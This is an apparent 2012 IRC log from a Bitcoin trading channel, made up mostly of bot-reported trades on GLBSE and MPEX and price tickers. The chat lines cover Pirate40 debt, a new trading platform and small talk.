1.1699 BTC [+] Aug 31 16:44:16 [GLBSE] [PUREMINING] 1 @ 0.092 BTC [-] Aug 31 16:54:16 [GLBSE] [ASICMINER] 17 @ 0.11706598 = 1.9901 BTC [+] Aug 31 16:57:06 [GLBSE] [GIGAMINING] 10 @ 0.868 = 8.68 BTC [+] Aug 31 16:58:40 [MPEX] [S.MPOE] 30197 @ 0.0003912 = 11.8131 BTC [+] Aug 31 16:58:42 [MPEX] [S.MPOE] 31100 @ 0.00039164 = 12.18 BTC [+] Aug 31 16:58:43 [MPEX] [S.MPOE] 703 @ 0.00039189 = 0.2755 BTC [+] Aug 31 16:58:51 [GLBSE] [PAJKA.BOND] 3 @ 0.06 = 0.18 BTC [+] Aug 31 16:59:12 !pl BDK 1 Aug 31 16:59:13 Requesting data from GLBSE (might take a while). Aug 31 16:59:47 BDK [1@1BTC] paid: 0.0095545 BTC. Last price: 0.1 BTC. Capital gain: -0.9 BTC. Total: -0.8904455 BTC. (-89%) Aug 31 17:01:45 [GLBSE] [GSDPT] 5 @ 0.00339999 = 0.017 BTC [+] Aug 31 17:02:43 ;;ticker Aug 31 17:02:44 Best bid: 10.40016, Best ask: 10.45, Bid-ask spread: 0.04984, Last trade: 10.45, 24 hour volume: 39452, 24 hour low: 10.2, 24 hour high: 10.87563 Aug 31 17:03:08 bdk actually started at 1 ?! Aug 31 17:05:47 nah, seems .1 Aug 31 17:06:08 !pl BDK 0.055 Aug 31 17:06:09 Requesting data from GLBSE (might take a while). Aug 31 17:06:15 BDK [1@0.055BTC] paid: 0.0095545 BTC. Last price: 0.1 BTC. Capital gain: 0.045 BTC. Total: 0.0545545 BTC. (99.2%) Aug 31 17:07:18 [MPEX] [S.MPOE] 11000 @ 0.00039189 = 4.3108 BTC [+] Aug 31 17:07:47 !pl BDK 0.1 Aug 31 17:07:47 Requesting data from GLBSE (might take a while). Aug 31 17:07:59 BDK [1@0.1BTC] paid: 0.0095545 BTC. Last price: 0.1 BTC. Capital gain: 0 BTC. Total: 0.0095545 BTC. (9.6%) Aug 31 17:08:20 anyone want to sell discounted pirate debt? Aug 31 17:10:56 No, I am buying Aug 31 17:12:36 lol really? Aug 31 17:12:51 i guess someone has to be:) Aug 31 17:15:28 [GLBSE] [FDBF] 1 @ 0.14 BTC [-] Aug 31 17:25:43 [GLBSE] [TEEK.USD] 8 @ 0.09 = 0.72 BTC [+] Aug 31 17:26:04 [GLBSE] [OBSI.HRPT] 2 @ 0.104988 = 0.21 BTC [-] Aug 31 17:26:33 chaang-noi why would you want to buy pirate debt...i thought pirate is done Aug 31 17:26:42 no, I got few at 0.9 or close but this is just play money. Aug 31 17:26:57 blazing: where did you get that idea? Aug 31 17:27:24 eb250 im confused Aug 31 17:27:30 9th is the grand finale. Or is it today? Aug 31 17:27:30 [GLBSE] [ZETA-MINING] 1 @ 0.14000001 BTC [-] Aug 31 17:27:38 did pirate make an announcement today? Aug 31 17:27:51 ohok the 9th Aug 31 17:27:54 no idea, I can not get in to the channel Aug 31 17:28:00 so we wait till the 9th Aug 31 17:28:35 did he paid 20 accounts or so? Aug 31 17:28:53 400+ to go? Aug 31 17:29:04 >< Aug 31 17:29:18 ;;ident EB250 Aug 31 17:29:19 Nick 'EB250', with hostmask 'EB250!~EB250@users.smartlink.ee', is not identified. Aug 31 17:29:26 are you new EB250 ? Aug 31 17:29:35 yes Aug 31 17:29:47 blazing buy low sell high Aug 31 17:30:29 a ok. so how do you like btc so far ? Aug 31 17:30:48 i have six tygrrbond-p bond for sale...sell at .8 Aug 31 17:30:58 each Aug 31 17:31:16 blazing isn't it trading .1 / .3 ? Aug 31 17:31:49 OK, time to go Aug 31 17:32:41 ohok Aug 31 17:32:58 well i might hold onto it then Aug 31 17:34:09 [GLBSE] [FDBF] 60 @ 0.14 = 8.4 BTC [-] Aug 31 17:34:30 [GLBSE] [FDBF] 2 @ 0.14 = 0.28 BTC [-] Aug 31 17:38:37 [GLBSE] [BIB.PIRATE] 1 @ 0.14 BTC [-] Aug 31 17:38:59 [GLBSE] [FOO.PPPPT] 1 @ 0.15 BTC [-] Aug 31 17:39:38 hi brendio Aug 31 17:39:42 [GLBSE] [CIUCIU.BOND] 10 @ 0.1 = 1 BTC [+] Aug 31 17:40:15 hi goat Aug 31 17:41:17 cambodia now? Aug 31 17:41:21 or kl? Aug 31 17:41:26 siem reap Aug 31 17:43:27 awesome Aug 31 17:43:35 thats not a bad town for a few nights Aug 31 17:43:38 my wife loves it Aug 31 17:43:46 your first time? Aug 31 17:43:55 going to see angkor wat i assume? Aug 31 17:47:20 third time. Might see angkor war, might not. Already been twice :) Aug 31 17:47:28 why go then? Aug 31 17:48:01 night live is okay, but i doubt worth flying to, lol Aug 31 17:48:47 visiting a friend Aug 31 17:48:53 http://i1081.photobucket.com/albums/j343/TyGrrTech/f58b08402757.jpg Aug 31 17:48:55 cool Aug 31 17:48:58 its a nice place to visit Aug 31 17:49:21 wat Aug 31 17:58:31 [GLBSE] [BIB.PIRATE] 8 @ 0.35 = 2.8 BTC [+] Aug 31 18:03:39 [GLBSE] [GIGAMINING] 6 @ 0.8306 = 4.9836 BTC [-] Aug 31 18:03:58 brendio i assume you will not pass anything to pirate about bond ownership? Aug 31 18:04:42 only net knows who owns the bonds Aug 31 18:05:38 [GLBSE] [FPGAMINING] 2 @ 0.825 = 1.65 BTC [-] Aug 31 18:05:45 [GLBSE] [FOO.PPPPT] 39 @ 0.35 = 13.65 BTC [+] Aug 31 18:05:50 *nef Aug 31 18:06:01 [GLBSE] [TYGRR.BOND-P] 47 @ 0.35 = 16.45 BTC [+] Aug 31 18:06:30 [GLBSE] [BIB.PIRATE] 55 @ 0.35 = 19.25 BTC [+] Aug 31 18:08:38 yeah Aug 31 18:08:45 nef said he wont pass it on Aug 31 18:10:49 [GLBSE] [BIT.INC] 1 @ 0.11 BTC [+] Aug 31 18:13:09 [GLBSE] [OBSI.HRPT] 1 @ 0.104988 BTC [-] Aug 31 18:14:19 [GLBSE] [FOO.PPPPT] 5 @ 0.4 = 2 BTC [+] Aug 31 18:19:35 [GLBSE] [TICKER] 50 @ 0.46 = 23 BTC [+] Aug 31 18:20:25 [MPEX] [S.MPOE] 13000 @ 0.00039032 = 5.0742 BTC [-] Aug 31 18:20:32 OMFG - imsaguy is the assbot right now Aug 31 18:21:01 Chaang-Noi: http://www.encyclopediabitcoinica.com/wiki/GoatsOnABoat << in case imsaslapper duznt let me back in Aug 31 18:21:08 https://bitcointalk.org/index.php?topic=105018.0 Aug 31 18:21:43 YAAAY :D Aug 31 18:21:46 ty Aug 31 18:22:02 :) Aug 31 18:22:05 thank you sir! Aug 31 18:22:12 np! Aug 31 18:22:24 WTF imsaguy Aug 31 18:22:50 i wonder if he ims a guy at all somedays - on his period atm Aug 31 18:22:58 oh Aug 31 18:23:00 i asked wtf Aug 31 18:23:05 they said "bot abuse" Aug 31 18:23:09 ? Aug 31 18:23:11 i dont think it was him Aug 31 18:23:13 keh Aug 31 18:23:30 lol why was he kicked? Aug 31 18:23:30 because there was no domain. Aug 31 18:23:31 Bot-Abuse Aug 31 18:23:38 ? Aug 31 18:23:41 i dont know Aug 31 18:23:42 that makes no sense Aug 31 18:23:51 my bots are regged as me Aug 31 18:23:57 as freenode requires Aug 31 18:24:02 and if they arent Aug 31 18:24:06 why kick the herder Aug 31 18:24:10 [GLBSE] [MMM] 4 @ 0.85 = 3.4 BTC [+] Aug 31 18:24:10 you tried to make a bot do someting Aug 31 18:24:11 /me slaps imsa Aug 31 18:24:14 [MPEX] [S.MPOE] 1800 @ 0.00039032 = 0.7026 BTC [-] Aug 31 18:24:16 [MPEX] [S.MPOE] 19573 @ 0.00038917 = 7.6172 BTC [-] Aug 31 18:24:18 i dont know Aug 31 18:24:21 meh Aug 31 18:24:23 lots of spam and shit going on Aug 31 18:24:34 yeh, im sure he has his panties wound pretty tight Aug 31 18:27:18 the daftest of things is that i have 2 bots in there - i can still see whats going on ... cud talk if i wanted ... lamehat imsa is defz stressed ryt now Aug 31 18:27:50 so 7.6 earthquake in the phillipines and heliben is dropping another QE bomb. Aug 31 18:28:30 maaan :( Aug 31 18:28:35 not cool Aug 31 18:28:35 [GLBSE] [BITCOINMINV] 100 @ 0.12999 = 12.999 BTC [-] Aug 31 18:28:36 [GLBSE] [BITCOINMINV] 14 @ 0.1349 = 1.8886 BTC [+] Aug 31 18:28:38 7.6 Aug 31 18:28:42 fuqme Aug 31 18:29:49 [GLBSE] [ADMINSORTED] 1 @ 0.99999 BTC [+] Aug 31 18:29:50 [GLBSE] [ADMINSORTED] 6 @ 1 = 6 BTC [+] Aug 31 18:30:50 apparently tsunami and all Aug 31 18:30:59 yay Aug 31 18:31:09 im opening bitcoin to metatrader bridge Aug 31 18:32:21 now that's pretty cool Aug 31 18:34:05 [GLBSE] [BIB.BVPS] 1000 @ 0.003 = 3 BTC [-] Aug 31 18:34:07 [GLBSE] [BIB.BVPS] 1000 @ 0.0029 = 2.9 BTC [-] Aug 31 18:34:08 [GLBSE] [BIB.BVPS] 1000 @ 0.0028 = 2.8 BTC [-] Aug 31 18:34:09 [GLBSE] [BIB.BVPS] 1000 @ 0.0027 = 2.7 BTC [-] Aug 31 18:34:10 [GLBSE] [BIB.BVPS] 1000 @ 0.0026 = 2.6 BTC [-] Aug 31 18:34:11 [GLBSE] [BIB.BVPS] 1000 @ 0.0025 = 2.5 BTC [-] Aug 31 18:34:21 ye Aug 31 18:34:26 you can already apply for an account Aug 31 18:34:37 and get it next week Aug 31 18:34:41 100btc min Aug 31 18:34:59 trade any pair with btc and earn btc Aug 31 18:35:02 ahaha Aug 31 18:35:07 wait, there's a minimum ? Aug 31 18:35:13 THIS IS A VERY FAILED PLATFORM Aug 31 18:35:16 to open an account Aug 31 18:35:17 i bet it runs porn. Aug 31 18:35:31 kakobrekla what happens if the us govt confiscates their website ??? Aug 31 18:35:32 with 100btc you can trade 0.1 lot Aug 31 18:35:51 i will be holding bitcoins and will never be transformed into fiat Aug 31 18:36:18 i don't care what you say *hands in ears* lalalalala. as long as it costs money to join IT SUCKS!!! Aug 31 18:36:31 it doesnt cost money Aug 31 18:36:40 you need a 100btc balance to be able to trade Aug 31 18:36:59 or to open an account Aug 31 18:37:47 >as long as it costs money to join IT SUCKS!!! Aug 31 18:37:51 i bet it has no volume. Aug 31 18:37:51 says the guy with 20btc reg fee :) Aug 31 18:37:56 [MPEX] [F.GIGA.ETF] 999 @ 0.0008636 = 0.8627 BTC [+] Aug 31 18:37:58 [MPEX] [F.GIGA.ETF] 15401 @ 0.00086077 = 13.2567 BTC [-] Aug 31 18:37:59 who has no volume? Aug 31 18:38:02 (you realise i'm just poking fun are you ?) Aug 31 18:38:10 ah Aug 31 18:38:13 sarcasm? Aug 31 18:38:52 [MPEX] [S.BVPS] 275 @ 0.00358902 = 0.987 BTC [-] Aug 31 18:38:52 [MPEX] [S.BVPS] 165 @ 0.00344763 = 0.5689 BTC [-] Aug 31 18:38:53 oh well Aug 31 18:38:53 [MPEX] [S.BVPS] 150 @ 0.00344762 = 0.5171 BTC [-] Aug 31 18:38:54 [MPEX] [S.BVPS] 31 @ 0.00341296 = 0.1058 BTC [-] Aug 31 18:38:55 [MPEX] [S.BVPS] 301 @ 0.00341245 = 1.0271 BTC [-] Aug 31 18:38:57 [MPEX] [S.BVPS] 78 @ 0.003379 = 0.2636 BTC [-] Aug 31 18:39:23 :p Aug 31 18:41:36 [GLBSE] [ASICMINER] 30 @ 0.10100002 = 3.03 BTC [-] Aug 31 18:41:48 [GLBSE] [BIB.BVPS] 1000 @ 0.0033 = 3.3 BTC [+] Aug 31 18:42:45 [GLBSE] [ASICMINER] 53 @ 0.10100001 = 5.353 BTC [-] Aug 31 18:50:58 [GLBSE] [SILVER] 27 @ 0.0098 = 0.2646 BTC [+] Aug 31 18:51:52 [GLBSE] [BDT] 20 @ 1.04 = 20.8 BTC [+] Aug 31 18:51:53 [GLBSE] [BDT] 9 @ 1.04 = 9.36 BTC [+] Aug 31 18:57:33 [MPEX] [S.MPOE] 20597 @ 0.00039189 = 8.0718 BTC [+] Aug 31 18:57:35 [MPEX] [S.MPOE] 17395 @ 0.00039203 = 6.8194 BTC [+] Aug 31 19:07:50 [MPEX] [S.MPOE] 599 @ 0.00038917 = 0.2331 BTC [-] Aug 31 19:07:50 [MPEX] [S.MPOE] 15985 @ 0.00038911 = 6.2199 BTC [-] Aug 31 19:08:53 !pl FOO.PPPPT 1 2012-08-01 Aug 31 19:08:53 Requesting data from GLBSE (might take a while). Aug 31 19:09:01 FOO.PPPPT [1@1BTC] (since: 2012-08-01) paid: 0.14 BTC. Last price: 0.4 BTC. Capital gain: -0.6 BTC. Total: -0.46 BTC. (-46%) Aug 31 19:10:04 [MPEX] [F.GIGA.ETF] 4900 @ 0.0008643 = 4.2351 BTC [+] Aug 31 19:14:46 [GLBSE] [GIGAMINING] 6 @ 0.8689 = 5.2134 BTC [+] Aug 31 19:17:53 [GLBSE] [BITCOINTORRENTZ] 4 @ 0.69 = 2.76 BTC [+] Aug 31 19:17:55 [GLBSE] [BITCOINTORRENTZ] 1 @ 0.749 BTC [+] Aug 31 19:17:56 [GLBSE] [BITCOINTORRENTZ] 4 @ 0.749 = 2.996 BTC [+] Aug 31 19:26:11 [GLBSE] [GIGAMINING] 9 @ 0.869 = 7.821 BTC [+] Aug 31 19:26:13 [GLBSE] [GIGAMINING] 8 @ 0.869999 = 6.96 BTC [+] Aug 31 19:26:13 [GLBSE] [GIGAMINING] 3 @ 0.87 = 2.61 BTC [+] Aug 31 19:30:54 [GLBSE] [BFLS.RIG] 10 @ 0.9486 = 9.486 BTC [+] Aug 31 19:33:02 [GLBSE] [NYAN] 26 @ 1 = 26 BTC [-] Aug 31 19:33:22 [GLBSE] [BIB.PIRATE] 10 @ 0.386 = 3.86 BTC [+] Aug 31 19:35:29 [GLBSE] [BITBOND] 1 @ 0.4694 BTC [-] Aug 31 19:35:31 [GLBSE] [BITBOND] 9 @ 0.4695 = 4.2255 BTC [+] Aug 31 19:37:35 [GLBSE] [BMF] 25 @ 0.595 = 14.875 BTC [+] Aug 31 19:42:44 [GLBSE] [BDT] 10 @ 1.01 = 10.1 BTC [-] Aug 31 19:42:46 [GLBSE] [BDT] 1 @ 1 BTC [-] Aug 31 19:55:59 [GLBSE] [GIGAMINING] 1 @ 0.84 BTC [-] Aug 31 19:56:00 [GLBSE] [GIGAMINING] 6 @ 0.8311 = 4.9866 BTC [-] Aug 31 19:56:02 [GLBSE] [GIGAMINING] 3 @ 0.831 = 2.493 BTC [-] Aug 31 19:56:03 [GLBSE] [GIGAMINING] 10 @ 0.8305 = 8.305 BTC [-] Aug 31 19:57:21 [GLBSE] [NYAN] 1 @ 1.01 BTC [+] Aug 31 19:57:36 [MPEX] [F.GIGA.ETF] 15878 @ 0.0008643 = 13.7234 BTC [+] Aug 31 19:57:36 [MPEX] [F.GIGA.ETF] 7773 @ 0.00086873 = 6.7526 BTC [+] Aug 31 19:57:38 [MPEX] [F.GIGA.ETF] 14600 @ 0.00086894 = 12.6865 BTC [+] Aug 31 19:57:39 [MPEX] [F.GIGA.ETF] 11749 @ 0.00087462 = 10.2759 BTC [+] Aug 31 19:57:55 [GLBSE] [BIB.PIRATE] 50 @ 0.2 = 10 BTC [-] Aug 31 20:05:57 [GLBSE] [PUREMINING] 3 @ 0.092 = 0.276 BTC [-] Aug 31 20:10:52 [MPEX] [S.MPOE] 1478 @ 0.00038911 = 0.5751 BTC [-] Aug 31 20:10:54 [MPEX] [S.MPOE] 14535 @ 0.00038867 = 5.6493 BTC [-] Aug 31 20:10:55 [MPEX] [S.MPOE] 18397 @ 0.00038813 = 7.1404 BTC [-] Aug 31 20:11:45 [GLBSE] [BIB.BVPS] 3000 @ 0.0025 = 7.5 BTC [-] Aug 31 20:11:46 [GLBSE] [BIB.BVPS] 1000 @ 0.0024 = 2.4 BTC [-] Aug 31 20:11:48 [GLBSE] [BIB.BVPS] 1000 @ 0.0023 = 2.3 BTC [-] Aug 31 20:11:48 [GLBSE] [BIB.BVPS] 1000 @ 0.0022 = 2.2 BTC [-] Aug 31 20:11:49 [GLBSE] [BIB.BVPS] 1000 @ 0.0021 = 2.1 BTC [-] Aug 31 20:11:50 [GLBSE] [BIB.BVPS] 848 @ 0.002 = 1.696 BTC [-] Aug 31 20:12:54 [MPEX] [S.BVPS] 20 @ 0.00338817 = 0.0678 BTC [+] Aug 31 20:12:56 [MPEX] [S.BVPS] 980 @ 0.00338234 = 3.3147 BTC [-] Aug 31 20:13:06 hum rg, seems you're under attack. Aug 31 20:17:12 [GLBSE] [PGM] 4 @ 0.24999 = 1 BTC [-] Aug 31 20:17:14 [GLBSE] [PGM] 4 @ 0.25 = 1 BTC [+] Aug 31 20:24:13 [GLBSE] [PUREMINING] 1 @ 0.092 BTC [-] Aug 31 20:25:29 [MPEX] [S.MPOE] 6300 @ 0.00038813 = 2.4452 BTC [-] Aug 31 20:27:05 [MPEX] [F.GIGA.ETF] 6100 @ 0.00087462 = 5.3352 BTC [+] Aug 31 20:27:50 [MPEX] [S.MPOE] 1600 @ 0.00039182 = 0.6269 BTC [+] Aug 31 20:27:52 [MPEX] [S.MPOE] 3800 @ 0.00039203 = 1.4897 BTC [+] Aug 31 20:36:45 [GLBSE] [FUTUREFUND] 300 @ 0.00012189 = 0.0366 BTC [+] Aug 31 20:37:17 [GLBSE] [FUTUREFUND] 12 @ 0.00012189 = 0.0015 BTC [+] Aug 31 20:38:46 [GLBSE] [FUTUREFUND] 110 @ 0.00012189 = 0.0134 BTC [+] Aug 31 20:45:10 [GLBSE] [GSDPT] 1995 @ 0.00339999 = 6.783 BTC [+] Aug 31 20:45:12 [GLBSE] [GSDPT] 3005 @ 0.0034 = 10.217 BTC [+] Aug 31 20:54:12 [GLBSE] [NYAN] 1 @ 1.01 BTC [+] Aug 31 20:58:48 ;;ticker Aug 31 20:58:49 Best bid: 10.24, Best ask: 10.32, Bid-ask spread: 0.08000, Last trade: 10.328, 24 hour volume: 36001, 24 hour low: 10.2, 24 hour high: 10.84 Aug 31 21:01:37 [GLBSE] [BIB.PIRATE] 50 @ 0.175 = 8.75 BTC [-] Aug 31 21:02:25 [MPEX] [S.MPOE] 29900 @ 0.00038894 = 11.6293 BTC [-] Aug 31 21:02:27 [MPEX] [S.MPOE] 6203 @ 0.00038813 = 2.4076 BTC [-] Aug 31 21:02:28 [MPEX] [S.MPOE] 2697 @ 0.000388 = 1.0464 BTC [-] Aug 31 21:02:40 [GLBSE] [FOO.PPPPT] 9 @ 0.39 = 3.51 BTC [-] Aug 31 21:03:57 [GLBSE] [FPGA.CONTRACT] 3 @ 0.09 = 0.27 BTC [+] Aug 31 21:04:39 [GLBSE] [GMVT-BOT] 2 @ 0.1785 = 0.357 BTC [+] Aug 31 21:04:49 [GLBSE] [BDT] 4 @ 0.98 = 3.92 BTC [-] Aug 31 21:09:06 [GLBSE] [BITBOND] 43 @ 0.4695 = 20.1885 BTC [+] Aug 31 21:10:59 [GLBSE] [TYGRR.BOND-P] 1 @ 0.2 BTC [-] Aug 31 21:11:01 [GLBSE] [TYGRR.BOND-P] 38 @ 0.18000101 = 6.84 BTC [-] Aug 31 21:11:53 [GLBSE] [FOO.PPPPT] 5 @ 0.39 = 1.95 BTC [-] Aug 31 21:11:55 [GLBSE] [FOO.PPPPT] 20 @ 0.4 = 8 BTC [+] Aug 31 21:18:25 [MPEX] [F.GIGA.ETF] 2851 @ 0.00087462 = 2.4935 BTC [+] Aug 31 21:18:26 [MPEX] [F.GIGA.ETF] 5249 @ 0.00087607 = 4.5985 BTC [+] Aug 31 21:22:18 [GLBSE] [FPGAMINING] 4 @ 0.8103 = 3.2412 BTC [-] Aug 31 21:22:20 [GLBSE] [FPGAMINING] 5 @ 0.8102 = 4.051 BTC [-] Aug 31 21:22:21 [GLBSE] [FPGAMINING] 1 @ 0.810101 BTC [-] Aug 31 21:22:22 [GLBSE] [FPGAMINING] 2 @ 0.79 = 1.58 BTC [-] Aug 31 21:22:23 [GLBSE] [FPGAMINING] 1 @ 0.78000001 BTC [-] Aug 31 21:22:24 [GLBSE] [FPGAMINING] 9 @ 0.78 = 7.02 BTC [-] Aug 31 21:22:25 [GLBSE] [FPGAMINING] 5 @ 0.77700001 = 3.885 BTC [-] Aug 31 21:22:26 [GLBSE] [FPGAMINING] 10 @ 0.777 = 7.77 BTC [-] Aug 31 21:22:27 [GLBSE] [FPGAMINING] 9 @ 0.711 = 6.399 BTC [-] Aug 31 21:22:28 [GLBSE] [FPGAMINING] 4 @ 0.71 = 2.84 BTC [-] Aug 31 21:22:50 [GLBSE] [FOO.PPPPT] 19 @ 0.4 = 7.6 BTC [+] Aug 31 21:34:35 [GLBSE] [OBSI.HRPT] 1 @ 0.104988 BTC [-] Aug 31 21:35:12 [GLBSE] [TEEK.B] 1 @ 0.94924 BTC [+] Aug 31 21:35:42 [GLBSE] [BDT] 2 @ 0.99 = 1.98 BTC [+] Aug 31 21:36:26 [GLBSE] [PUREMINING] 2 @ 0.09199999 = 0.184 BTC [-] Aug 31 21:36:44 [GLBSE] [PUREMINING] 2 @ 0.092 = 0.184 BTC [+] Aug 31 21:55:19 [MPEX] [O.BTCUSD.P010T] 13 @ 0.02859399 = 0.3717 BTC [+] Aug 31 21:55:21 [MPEX] [O.BTCUSD.P010T] 9 @ 0.01976642 = 0.1779 BTC [-] Aug 31 21:58:00 [GLBSE] [TEEK.B] 1 @ 0.79 BTC [-] Aug 31 22:00:15 [MPEX] [O.BTCUSD.C130N] 1 @ 0.11221286 BTC [-] Aug 31 22:00:18 [MPEX] [O.BTCUSD.P030T] 6 @ 0.02245236 = 0.1347 BTC [+] Aug 31 22:04:05 [GLBSE] [ARS] 30 @ 0.0148 = 0.444 BTC [+] Aug 31 22:07:46 [GLBSE] [OBSI.HRPT] 1 @ 0.104987 BTC [-] Aug 31 22:16:23 <_locust_> ;;ticker Aug 31 22:16:23 Best bid: 10.01, Best ask: 10.0989, Bid-ask spread: 0.08890, Last trade: 10.098, 24 hour volume: 47471, 24 hour low: 10, 24 hour high: 10.8359 Aug 31 22:17:42 [GLBSE] [MPOE.ETF] 3 @ 1.399999 = 4.2 BTC [+] Aug 31 22:20:20 [MPEX] [O.BTCUSD.C110N] 2 @ 0.17408847 = 0.3482 BTC [-] Aug 31 22:27:35 [GLBSE] [BFLS.RIG] 8 @ 0.9486 = 7.5888 BTC [+] Aug 31 22:33:48 [GLBSE] [NYAN.C] 1 @ 0.5 BTC [+] Aug 31 22:35:53 [GLBSE] [TEEK.B] 1 @ 0.7701 BTC [-] Aug 31 22:36:53 [GLBSE] [BBBB] 200 @ 0.00024 = 0.048 BTC [+] Aug 31 22:44:10 [GLBSE] [TYGRR.BOND-P] 12 @ 0.18000101 = 2.16 BTC [-] Aug 31 22:44:11 [GLBSE] [TYGRR.BOND-P] 60 @ 0.180001 = 10.8001 BTC [-] Aug 31 22:46:42 so hm Aug 31 22:46:58 getting a lot of change the name for smpake Aug 31 22:47:08 any suggestions? Aug 31 22:47:21 like instabit? it has 'stab it' in it. Aug 31 22:48:20 [GLBSE] [GIGAMINING] 6 @ 0.830701 = 4.9842 BTC [+] Aug 31 22:48:22 [GLBSE] [GIGAMINING] 10 @ 0.830601 = 8.306 BTC [-] Aug 31 22:48:23 [GLBSE] [GIGAMINING] 10 @ 0.8305 = 8.305 BTC [-] Aug 31 22:48:23 [GLBSE] [GIGAMINING] 5 @ 0.8301 = 4.1505 BTC [-] Aug 31 22:48:25 [GLBSE] [GIGAMINING] 1 @ 0.82 BTC [-] Aug 31 22:48:26 [GLBSE] [GIGAMINING] 9 @ 0.811 = 7.299 BTC [-] Aug 31 22:48:27 [GLBSE] [GIGAMINING] 12 @ 0.81 = 9.72 BTC [-] Aug 31 22:48:28 [GLBSE] [GIGAMINING] 14 @ 0.81 = 11.34 BTC [-] Aug 31 22:48:29 [GLBSE] [GIGAMINING] 80 @ 0.81 = 64.8 BTC [-] Aug 31 22:50:48 [MPEX] [O.BTCUSD.C110N] 6 @ 0.1731108 = 1.0387 BTC [-] Aug 31 22:51:26 meh Aug 31 22:51:30 thats taken anyway Aug 31 22:51:31 kakobrekla: any plans to offer USD MtGox voucher? Aug 31 22:52:02 well i have been asked about supporting usd input Aug 31 22:52:19 accually i am willing to implement whatever the users need Aug 31 22:52:41 but im not sure if they know they need it Aug 31 22:52:52 seems like no to me :> Aug 31 22:55:19 BTC -> MtGox USD code would be quite useful when touching withdrawal limits Aug 31 22:57:50 the fee on that would have to be high Aug 31 22:57:54 or result unpredictable Aug 31 23:00:15 [GLBSE] [OBSI.HRPT] 12 @ 0.104987 = 1.2598 BTC [-] Aug 31 23:00:51 [MPEX] [F.GIGA.ETF] 7699 @ 0.00086077 = 6.6271 BTC [-] Aug 31 23:00:53 [MPEX] [F.GIGA.ETF] 500 @ 0.00085762 = 0.4288 BTC [-] Aug 31 23:00:54 [MPEX] [S.DICE] 99100 @ 0.0033 = 327.03 BTC [-] Aug 31 23:01:06 [GLBSE] [OBSI.HRPT] 79 @ 0.104987 = 8.294 BTC [-] Aug 31 23:03:03 02:17 gribble | pirateat40 was last seen in #btcst 28 minutes and 10 seconds ago: Total Accounts Repaid: 22/459 (subject to required information) Aug 31 23:03:19 ;;ticker Aug 31 23:03:20 Best bid: 9.80011, Best ask: 9.81, Bid-ask spread: 0.00989, Last trade: 9.81, 24 hour volume: 50748, 24 hour low: 9.8, 24 hour high: 10.83571 Aug 31 23:03:44 Any actual, real claim of accounts being repaid? Aug 31 23:04:42 [GLBSE] [TEEK.USD] 53 @ 0.089999 = 4.7699 BTC [-] Aug 31 23:08:41 [GLBSE] [NASTY] 1 @ 0.48000001 BTC [-] Aug 31 23:08:43 [GLBSE] [NASTY] 1 @ 0.48 BTC [-] Aug 31 23:10:00 [MPEX] [F.GIGA.ETF] 10024 @ 0.00084927 = 8.5131 BTC [-] Aug 31 23:10:32 [GLBSE] [BDT] 1 @ 0.99 BTC [+] Aug 31 23:19:14 [GLBSE] [FPGAMINING] 1 @ 0.73 BTC [+] Aug 31 23:19:15 [GLBSE] [FPGAMINING] 2 @ 0.71121 = 1.4224 BTC [-] Aug 31 23:21:21 ;;later tell doffx http://bitbin.it/lOgacEil Aug 31 23:21:21 The operation succeeded. Aug 31 23:25:28 [MPEX] [S.MPOE] 21000 @ 0.00039142 = 8.2198 BTC [+] Aug 31 23:25:29 [MPEX] [S.MPOE] 39613 @ 0.00039203 = 15.5295 BTC [+] Aug 31 23:26:10 [GLBSE] [NYAN.C] 44 @ 0.5 = 22 BTC [+] Aug 31 23:29:19 [GLBSE] [TEEK.B] 7 @ 0.77001 = 5.3901 BTC [-] Aug 31 23:29:21 [GLBSE] [TEEK.B] 4 @ 0.77011 = 3.0804 BTC [+] Aug 31 23:35:16 [MPEX] [S.MPOE] 1081 @ 0.00039269 = 0.4245 BTC [+] Aug 31 23:35:18 [MPEX] [S.MPOE] 35400 @ 0.00039102 = 13.8421 BTC [-] Aug 31 23:37:41 [GLBSE] [FOO.PPPPT] 3 @ 0.20000001 = 0.6 BTC [-] Aug 31 23:37:43 [GLBSE] [FOO.PPPPT] 2 @ 0.2 = 0.4 BTC [-] Aug 31 23:38:11 hey mircea_popescu, do you have a link about why mining bonds suck? Aug 31 23:40:44 [GLBSE] [ASICMINER] 10 @ 0.11399999 = 1.14 BTC [+] Aug 31 23:40:45 [GLBSE] [ASICMINER] 25 @ 0.114 = 2.85 BTC [+] Aug 31 23:40:46 [GLBSE] [ASICMINER] 45 @ 0.1140699 = 5.1331 BTC [+] Aug 31 23:45:35 [GLBSE] [ASICMINER] 5 @ 0.1140699 = 0.5703 BTC [+] Aug 31 23:45:37 [GLBSE] [ASICMINER] 20 @ 0.11416999 = 2.2834 BTC [+] Aug 31 23:45:38 [GLBSE] [ASICMINER] 31 @ 0.11417 = 3.5393 BTC [+] Aug 31 23:54:29 [GLBSE] [PUREMINING] 5 @ 0.092 = 0.46 BTC [+] Aug 31 23:58:35 [GLBSE] [OBSI.HRPT] 9 @ 0.1030102 = 0.9271 BTC [-] Aug 31 23:59:02 [GLBSE] [OBSI.HRPT] 3 @ 0.1030101 = 0.309 BTC [-] Aug 31 23:59:22 [GLBSE] [OBSI.HRPT] 5 @ 0.10301 = 0.5151 BTC [-] Sep 01 00:00:21 [GLBSE] [OBSI.HRPT] 1 @ 0.103 BTC [-] Sep 01 00:00:23 [GLBSE] [OBSI.HRPT] 22 @ 0.103 = 2.266 BTC [-] Sep 01 00:01:30 [GLBSE] [ARS] 20 @ 0.0148 = 0.296 BTC [+] Sep 01 00:02:28 [GLBSE] [TYGRR.BOND-P] 5 @ 0.2 = 1 BTC [+] Sep 01 00:17:59 [MPEX] [S.MPOE] 27519 @ 0.00039069 = 10.7514 BTC [-] Sep 01 00:18:00 [MPEX] [S.MPOE] 4481 @ 0.00039223 = 1.7576 BTC [+] Sep 01 00:30:37 pigeons: I can show you my account history if that helps Sep 01 00:36:43 [GLBSE] [OBSI.HRPT] 591 @ 0.103 = 60.873 BTC [-] Sep 01 00:41:28 [GLBSE] [OBSI.HRPT] 3 @ 0.104986 = 0.315 BTC [+] Sep 01 00:42:27 [GLBSE] [OBSI.HRPT] 7 @ 0.104986 = 0.7349 BTC [+] Sep 01 00:43:28 why is BTC in the shitter today? Sep 01 00:43:34 ;;ticker Sep 01 00:43:34 Best bid: 9.67081, Best ask: 9.7779, Bid-ask spread: 0.10709, Last trade: 9.67079, 24 hour volume: 58933, 24 hour low: 9.67079, 24 hour high: 10.8285 Sep 01 00:47:30 [GLBSE] [JLP-BMD] 4 @ 0.09998 = 0.3999 BTC [-] Sep 01 00:47:51 Maybe pirate 